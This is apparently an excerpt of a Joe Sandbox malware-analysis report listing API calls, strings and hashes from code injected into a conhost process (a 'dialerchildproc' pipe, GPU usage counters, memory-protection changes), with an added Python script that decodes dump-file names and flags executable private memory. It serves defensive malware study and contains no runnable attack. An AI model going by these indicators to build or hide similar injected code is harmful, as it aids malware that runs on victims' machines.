                                                                    • Part of subcall function 0000014ECB4ADB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000014ECB4A643A), ref: 0000014ECB4ADB94
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD395
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD3A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 570795689-0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                  • API String ID: 1943346504-1805530042

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                  • API String ID: 1943346504-3507739905
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeLibraryProc
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3013587201-537541572

                                                                  Control-flow Graph
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                  • String ID: d
                                                                  • API String ID: 3743429067-2564639436

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • FlsGetValue.KERNEL32(?,?,?,0000014ECB4ACC0E,?,?,?,?,?,?,?,?,0000014ECB4AD3CD,?,?,00000001), ref: 0000014ECB4AD4B7
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ACC0E,?,?,?,?,?,?,?,?,0000014ECB4AD3CD,?,?,00000001), ref: 0000014ECB4AD4D6
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ACC0E,?,?,?,?,?,?,?,?,0000014ECB4AD3CD,?,?,00000001), ref: 0000014ECB4AD4FE
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ACC0E,?,?,?,?,?,?,?,?,0000014ECB4AD3CD,?,?,00000001), ref: 0000014ECB4AD50F
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ACC0E,?,?,?,?,?,?,?,?,0000014ECB4AD3CD,?,?,00000001), ref: 0000014ECB4AD520
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: 1%$Y%
                                                                  • API String ID: 3702945584-1395475152

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                  • String ID: \\.\pipe\dialerchildproc
                                                                  • API String ID: 166002920-1933775637

                                                                  Control-flow Graph
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID:
                                                                  • API String ID: 190073905-0
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,0000014ECB4AA3B3,?,?,?,0000014ECB4A9B9C,?,?,?,?,0000014ECB4A96BD), ref: 0000014ECB4AA279
                                                                  • GetLastError.KERNEL32(?,?,?,0000014ECB4AA3B3,?,?,?,0000014ECB4A9B9C,?,?,?,?,0000014ECB4A96BD), ref: 0000014ECB4AA287
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,0000014ECB4AA3B3,?,?,?,0000014ECB4A9B9C,?,?,?,?,0000014ECB4A96BD), ref: 0000014ECB4AA2B1
                                                                  • FreeLibrary.KERNEL32(?,?,?,0000014ECB4AA3B3,?,?,?,0000014ECB4A9B9C,?,?,?,?,0000014ECB4A96BD), ref: 0000014ECB4AA2F7
                                                                  • GetProcAddress.KERNEL32(?,?,?,0000014ECB4AA3B3,?,?,?,0000014ECB4A9B9C,?,?,?,?,0000014ECB4A96BD), ref: 0000014ECB4AA303
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                  • String ID: api-ms-
                                                                  • API String ID: 2559590344-2084034818
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                  • String ID: CONOUT$
                                                                  • API String ID: 3230265001-3130406586
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                  • String ID: wr
                                                                  • API String ID: 1092925422-2678910430
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: Thread$Current$Context
                                                                  • String ID:
                                                                  • API String ID: 1666949209-0
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID: dialer
                                                                  • API String ID: 756756679-3528709123
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,0000014ECB4ADAE5,?,?,?,?,0000014ECB4ADBA8), ref: 0000014ECB4AD3DF
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ADAE5,?,?,?,?,0000014ECB4ADBA8), ref: 0000014ECB4AD415
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ADAE5,?,?,?,?,0000014ECB4ADBA8), ref: 0000014ECB4AD442
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ADAE5,?,?,?,?,0000014ECB4ADBA8), ref: 0000014ECB4AD453
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ADAE5,?,?,?,?,0000014ECB4ADBA8), ref: 0000014ECB4AD464
                                                                  • SetLastError.KERNEL32(?,?,?,0000014ECB4ADAE5,?,?,?,?,0000014ECB4ADBA8), ref: 0000014ECB4AD47F
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 2506987500-0
                                                                  • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction ID: d9cd7472ae20f1cfecc0355ec7d51c513d08cf06d2b1364651a82dcf923acab8
                                                                  • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction Fuzzy Hash: 4D115E7430D6B08AFE64972275C53E961D67B48BF0F144324AB3647AF6FB28D421A200
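The dump-file names above carry the process and memory-region metadata an analyst needs to place these disassembled snippets, but the report never spells them out. The following decoder is an added example, not Joe Sandbox code and not part of this report. The PAGE_* and MEM_* values are the winnt.h constants; the `.sdmp` field layout it parses (pid.iteration.dump-id.base.protection.three trailing fields) and the `hcaresult_<pid>_<iteration>_<base>_<process>.jbxd` snapshot pattern are assumptions inferred from how the names on this page line up with those constants, so only pid, iteration, base address and protection are treated as reliable. Run against the names quoted here, it shows that 0x43 is process 67, the same conhost process the snapshot files come from, that the 0x14ECB470000 region of iteration 3 is PAGE_EXECUTE_READWRITE, and that the PE at 0x14ECB4A0000 sits in memory whose trailing field decodes as MEM_PRIVATE rather than MEM_IMAGE.

```python
"""Decode the Joe Sandbox dump-file names quoted in this report.

Added example; not Joe Sandbox code. PAGE_* and MEM_* values are the winnt.h
constants. The .sdmp layout below is an ASSUMPTION inferred from how the values
on this page line up with those constants:

    <pid>.<iteration>.<dump id>.<base address>.<protection>.<f6>.<f7>.<f8>.sdmp

Only pid, iteration, base and protection are interpreted with confidence; the
three trailing fields are decoded opportunistically and otherwise shown raw.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = ((0x100, "PAGE_GUARD"), (0x200, "PAGE_NOCACHE"), (0x400, "PAGE_WRITECOMBINE"))
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80
MEM_CONSTANTS = {
    0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE",
    0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE",
}

HEX8 = r"[0-9A-Fa-f]{8}"
SDMP_RE = re.compile(
    rf"^(?P<pid>{HEX8})\.(?P<iter>{HEX8})\.(?P<dumpid>\d+)\.(?P<base>[0-9A-Fa-f]{{16}})\."
    rf"(?P<prot>{HEX8})\.(?P<f6>{HEX8})\.(?P<f7>{HEX8})\.(?P<f8>{HEX8})\.sdmp$"
)
# Assumed snapshot pattern: hcaresult_<pid>_<iteration>_<base>_<process>.jbxd
# (pid and iteration decimal, base hex), as seen on this page.
SNAPSHOT_RE = re.compile(r"^hcaresult_(?P<pid>\d+)_(?P<iter>\d+)_(?P<base>[0-9A-Fa-f]+)_(?P<proc>.+)\.jbxd$")


@dataclass(frozen=True)
class Dump:
    pid: int
    iteration: int
    dump_id: str
    base: int
    protect: int
    trailing: tuple[int, int, int]

    @property
    def protect_name(self) -> str:
        low = self.protect & 0xFF
        parts = [PAGE_PROTECT.get(low, f"0x{low:02X}")]
        parts += [name for bit, name in PAGE_MODIFIERS if self.protect & bit]
        return "|".join(parts)

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)

    def trailing_names(self) -> list[str]:
        """Decode f6..f8 against MEM_* constants where they match; raw hex otherwise."""
        return [MEM_CONSTANTS.get(v, f"0x{v:X}") for v in self.trailing]


def parse_sdmp(name: str) -> Dump:
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError(f"not an .sdmp name: {name!r}")
    return Dump(
        pid=int(m["pid"], 16), iteration=int(m["iter"], 16), dump_id=m["dumpid"],
        base=int(m["base"], 16), protect=int(m["prot"], 16),
        trailing=(int(m["f6"], 16), int(m["f7"], 16), int(m["f8"], 16)),
    )


def parse_snapshot(name: str) -> dict:
    m = SNAPSHOT_RE.match(name)
    if m is None:
        raise ValueError(f"not a snapshot name: {name!r}")
    return {"pid": int(m["pid"]), "iteration": int(m["iter"]),
            "base": int(m["base"], 16), "process": m["proc"]}


def same_capture(d: Dump, snap: dict) -> bool:
    """True when a dump and a snapshot come from the same process and iteration."""
    return d.pid == snap["pid"] and d.iteration == snap["iteration"]


def triage(d: Dump, based_on_pe: bool = False) -> list[str]:
    """Properties an analyst looks at first. The last two depend on the assumed
    layout, since they read MEM_PRIVATE / MEM_IMAGE out of the trailing fields."""
    flags = []
    names = d.trailing_names()
    if d.executable and d.writable:
        flags.append("RWX")                  # writable and executable at once
    if d.executable and "MEM_PRIVATE" in names:
        flags.append("EXEC_PRIVATE")         # executable code not backed by a mapped image
    if based_on_pe and "MEM_IMAGE" not in names:
        flags.append("PE_NOT_IMAGE_MAPPED")  # a PE where the loader did not map one
    return flags


# Dump and snapshot names exactly as they appear on this page.
REPORT_DUMPS = [
    "00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp",
    "00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp",
    "00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp",
]
REPORT_SNAPSHOT = "hcaresult_67_2_14ecb4a0000_conhost.jbxd"

if __name__ == "__main__":
    snap = parse_snapshot(REPORT_SNAPSHOT)
    for name in REPORT_DUMPS:
        d = parse_sdmp(name)
        print(f"pid {d.pid} iter {d.iteration} base 0x{d.base:X} {d.protect_name:<22} "
              f"{'/'.join(d.trailing_names()):<28} same_capture={same_capture(d, snap)} "
              f"flags={triage(d, based_on_pe=True)}")
```

The `based_on_pe` argument mirrors the report's own "based on PE: true" annotation; pass it only for dumps the report marks that way. The trailing-field decode is deliberately loose (the 0x00000001 in the iteration-3 name matches no MEM_* constant and is printed raw) so that a wrong layout guess shows up as an odd value rather than a confident misreading.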
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID:
                                                                  • API String ID: 517849248-0
                                                                  • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction ID: dac20ba40e4ab18405f106993ada258ddb34ec7eb8b8d334af9d18a2e780dfa7
                                                                  • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction Fuzzy Hash: B3011731708A408AEE14DB12B898799A2E5F788FC0F484134DF8A83768EF38C989D740
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                  • String ID:
                                                                  • API String ID: 449555515-0
                                                                  • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction ID: daa1f254b24549814455c8832ccdf00eccf9ee84d069f52ed4131b42f87bfcc6
                                                                  • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction Fuzzy Hash: 34011735619B448AEF249B26F88879AB3E1BB59B45F040428CF4D467B6FF3DC458A700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction ID: 33f1637741e2313f0f6f6dcb5c428a236f5c974285f55f870c9bc43a16145b1b
                                                                  • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction Fuzzy Hash: A451AB727196008EEF54CB26F484B9937E5F390B9AF518125DB86637A8FB35C841E701
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                  • String ID: csm$f
                                                                  • API String ID: 2395640692-629598281
                                                                  • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction ID: 965eb8a26f9da2d3bec19079d3500027326f479bd9ad565bcb908c9c5e6603b4
                                                                  • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction Fuzzy Hash: A751AB336196208EEF18CB25F488BD933E9F340B98F518124DB16877A8FB35C961E704
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction ID: a8e0203c589ca72d3ee40062dc9da409cd1db6d1748801c39dac5d0965335795
                                                                  • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction Fuzzy Hash: 29319C322197408EEF14DF22F884B9937E4F340B99F558014EF96537A5EB39C941E704
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                  • String ID: csm$f
                                                                  • API String ID: 2395640692-629598281
                                                                  • Opcode ID: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                                  • Instruction ID: c94268d2ef066480d23149efd2f8e31cb5ea7c4b2a23974b180cd3b2ddb0bbbc
                                                                  • Opcode Fuzzy Hash: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                                  • Instruction Fuzzy Hash: E1319132209A609EEF14DF15F888BDA77E8F340B88F558014AF56477A8EB38C961E704
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                  • String ID: \\?\
                                                                  • API String ID: 2719912262-4282027825
                                                                  • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction ID: 4a3d00bd609ffdeb84294fe8d25642d74be7a577b0e3eb28c1f44204beb739b7
                                                                  • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction Fuzzy Hash: 15F06872348A819AEF208F21F5D47D9A3A0F744B98F844020DB4986974EF7CC648D700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CombinePath
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3422762182-91387939
                                                                  • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction ID: d70698dd1dcf4f203e29825757f32f0de361c7d4eb8d0262746d17ba847ee2c5
                                                                  • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction Fuzzy Hash: 29F0F87521CB9086EE149B17B99419AA6A5BB48FC0F08A021EF5A87B28EF38C455D700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
